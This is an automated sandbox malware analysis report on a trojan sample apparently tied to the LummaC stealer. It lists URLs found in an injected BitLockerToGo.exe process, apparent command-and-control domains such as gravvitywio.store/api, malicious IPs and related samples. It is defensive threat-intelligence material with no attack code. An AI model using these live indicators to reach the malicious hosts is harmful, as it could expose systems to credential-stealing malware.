                                                                                              https://steamcommunity.com/profiles/76561199724331900/inventory/BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                              • URL Reputation: malware
                                                                                              		unknown
                                                                                              https://www.youtube.com/BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&aBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgBitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://protobuf.dev/reference/go/faq#namespace-conflictnot7wN7BF7WfX.exefalse
                                                                                                      		unknown
                                                                                                      https://racedsuitreow.shop/BitLockerToGo.exe, 00000004.00000003.1739688628.0000000002C47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://www.google.com/recaptcha/BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://checkout.steampowered.com/BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://racedsuitreow.shop/&7BitLockerToGo.exe, 00000004.00000003.1739688628.0000000002C47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://avatars.akamai.steamstaticBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://racedsuitreow.shop/.7BitLockerToGo.exe, 00000004.00000003.1739688628.0000000002C47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://store.steampowered.com/;BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://store.steampowered.com/about/BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://steamcommunity.com/my/wishlist/BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://surroundeocw.shop/apiBitLockerToGo.exe, 00000004.00000003.1766159958.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2041862232.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C3F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C0C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C2D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://help.steampowered.com/en/BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://steamcommunity.com/market/BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://store.steampowered.com/news/BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://community.akamai.steamstatic.com/BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=8vRVyaZKBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000004.00000002.2041942999.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765638924.0000000002CAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://gravvitywio.store/~7BitLockerToGo.exe, 00000004.00000003.1766159958.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2041862232.0000000002C2D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgBitLockerToGo.exe, 00000004.00000002.2041942999.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765638924.0000000002CAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://recaptcha.net/recaptcha/;BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://repository.certum.pl/cevcsca2021.cer07wN7BF7WfX.exefalse
                                                                                                                                		unknown
                                                                                                                                https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://steamcommunity.com/discussions/BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://gravvitywio.store:443/apiBitLockerToGo.exe, 00000004.00000002.2041862232.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765923337.0000000002C21000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1766159958.0000000002C23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://store.steampowered.com/stats/BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://medal.tvBitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://broadcast.st.dl.eccdnx.comBitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1BitLockerToGo.exe, 00000004.00000002.2041942999.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765638924.0000000002CAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://racedsuitreow.shop/apiBitLockerToGo.exe, 00000004.00000003.1739688628.0000000002C47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://store.steampowered.com/steam_refunds/BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://subca.ocsp-certum.com027wN7BF7WfX.exefalse
                                                                                                                                        		unknown
                                                                                                                                        https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://crl.certum.pl/ctnca2.crl0l7wN7BF7WfX.exefalse
                                                                                                                                            		unknown
                                                                                                                                            http://repository.certum.pl/ctnca2.cer097wN7BF7WfX.exefalse
                                                                                                                                              		unknown
                                                                                                                                              https://gravvitywio.store/eBitLockerToGo.exe, 00000004.00000003.1765698684.0000000002C0C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2041744613.0000000002C0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://steamcommunity.com/workshop/BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown

                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public IPs

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  104.21.8.235
                                                                                                                                                  		dividenntykw.shopUnited States
                                                                                                                                                  		13335CLOUDFLARENETUStrue
                                                                                                                                                  104.102.49.254
                                                                                                                                                  		steamcommunity.comUnited States
                                                                                                                                                  		16625AKAMAI-ASUSfalse
                                                                                                                                                  172.67.209.193
                                                                                                                                                  		gravvitywio.storeUnited States
                                                                                                                                                  		13335CLOUDFLARENETUStrue

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                  Analysis ID:1524037
                                                                                                                                                  Start date and time:2024-10-02 14:59:42 +02:00
                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 6m 19s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                  Run name:Run with higher sleep bypass
                                                                                                                                                  Number of analysed new started processes analysed:10
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Sample name:7wN7BF7WfX.exe
                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                  Original Sample Name:cef24501f390557eb4dd01b93d2fa273d3a0170805deaade53bc832b63adcd74.exe
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal93.troj.evad.winEXE@3/0@11/3
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 50%
                                                                                                                                                  HCA Information:Failed
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                                                  Warnings

                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                  • Execution Graph export aborted for target 7wN7BF7WfX.exe, PID 7428 because there are no executed function
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                  • VT rate limit hit for: 7wN7BF7WfX.exe

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  104.21.8.235BW4pTs1x3V.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                    104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                    • www.valvesoftware.com/legal.htm
                                                                                                                                                    172.67.209.193N65c8rwdal.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                      BW4pTs1x3V.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                          Google_Chrome.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            https://finalstepgetshere.com/uploads/beta111.zipGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse

                                                                                                                                                                Domains

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                dividenntykw.shopBW4pTs1x3V.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.21.8.235
                                                                                                                                                                BW4pTs1x3V.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 172.67.188.210
                                                                                                                                                                gravvitywio.storeBW4pTs1x3V.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.21.16.12
                                                                                                                                                                IGAnbXyZVx.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.21.16.12
                                                                                                                                                                N65c8rwdal.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                BW4pTs1x3V.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                • 104.21.16.12
                                                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                • 104.21.16.12
                                                                                                                                                                b222.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.21.16.12
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                • 104.21.16.12
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                steamcommunity.comBW4pTs1x3V.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                IGAnbXyZVx.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                N65c8rwdal.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                BW4pTs1x3V.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                b222.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254

                                                                                                                                                                ASNs

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                CLOUDFLARENETUSBW4pTs1x3V.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.21.16.12
                                                                                                                                                                IGAnbXyZVx.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.21.16.12
                                                                                                                                                                35Mcl9DxHR.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 172.67.178.253
                                                                                                                                                                N65c8rwdal.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                BW4pTs1x3V.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 172.67.188.210
                                                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                • 172.67.140.92
                                                                                                                                                                l5pPoBu9i3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 172.67.178.253
                                                                                                                                                                z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                • 104.26.12.205
                                                                                                                                                                http://www.freemangas.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 172.67.74.221
                                                                                                                                                                AKAMAI-ASUSBW4pTs1x3V.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                IGAnbXyZVx.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                N65c8rwdal.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                BW4pTs1x3V.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                eEu5xPVQUo.exeGet hashmaliciousRhysidaBrowse
                                                                                                                                                                • 96.17.64.189
                                                                                                                                                                62-3590.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 96.17.64.189
                                                                                                                                                                DV2mrnfX2d.exeGet hashmaliciousRhysidaBrowse
                                                                                                                                                                • 23.56.162.185
                                                                                                                                                                eEu5xPVQUo.exeGet hashmaliciousRhysidaBrowse
                                                                                                                                                                • 96.17.64.189
                                                                                                                                                                CLOUDFLARENETUSBW4pTs1x3V.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.21.16.12
                                                                                                                                                                IGAnbXyZVx.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.21.16.12
                                                                                                                                                                35Mcl9DxHR.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 172.67.178.253
                                                                                                                                                                N65c8rwdal.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 172.67.209.193
                                                                                                                                                                BW4pTs1x3V.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 172.67.188.210
                                                                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                                • 172.67.140.92
                                                                                                                                                                l5pPoBu9i3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 172.67.178.253
                                                                                                                                                                z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                • 104.26.12.205
                                                                                                                                                                http://www.freemangas.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 172.67.74.221

                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                a0e9f5d64349fb13191bc781f81f42e1BW4pTs1x3V.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                • 172.67.209.193
